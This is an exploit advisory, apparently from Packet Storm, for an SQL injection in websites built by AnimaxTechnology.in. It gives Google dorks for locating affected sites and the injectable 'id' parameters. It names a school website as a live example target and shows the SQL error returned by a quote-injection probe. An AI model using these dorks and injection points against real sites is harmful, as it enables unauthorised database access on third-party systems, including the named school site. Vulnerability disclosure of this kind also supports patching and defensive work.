AnimaxTechnology.in India Web Design version 1.0 suffers from a remote SQL injection vulnerability.
9d573460352e7e81050f54da76949d350a784efa3762cf9e1373747405290735##############################################################
# Exploit Title : AnimaxTechnology.in India Web Design 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepage : animaxtechnology.in
# Tested On : Windows and Linux
# Exploit Risk : Medium
# Version Information : Apache 2.4.33 - OpenSSL 1.0.2o
# CWE : CWE-89 [ Improper Neutralization
of Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018050298
##############################################################
Powered by AnimaxTechnology.in India SQL Injection Vulnerability
##############################################################
# Google Dork : intext:''Powered by Animaxtechnology.in''
# Google Dork : intext:''A(c) 2018 Animax Technology''
# Exploit : /news&events.php?id=[SQL Injection]
# Exploit : /aboutus.php?id=[SQL Injection]
##############################################################
# Example Site => abhinavpublicschoolrohini.com/aboutus.php?id=1%27
[ Proof of Concept for SQL Injection ] => archive.is/ONpCK
# SQL/DB Error : select * from tbl_aboutus where id='1''
You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near ''1''' at
line 1'
##############################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
##############################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed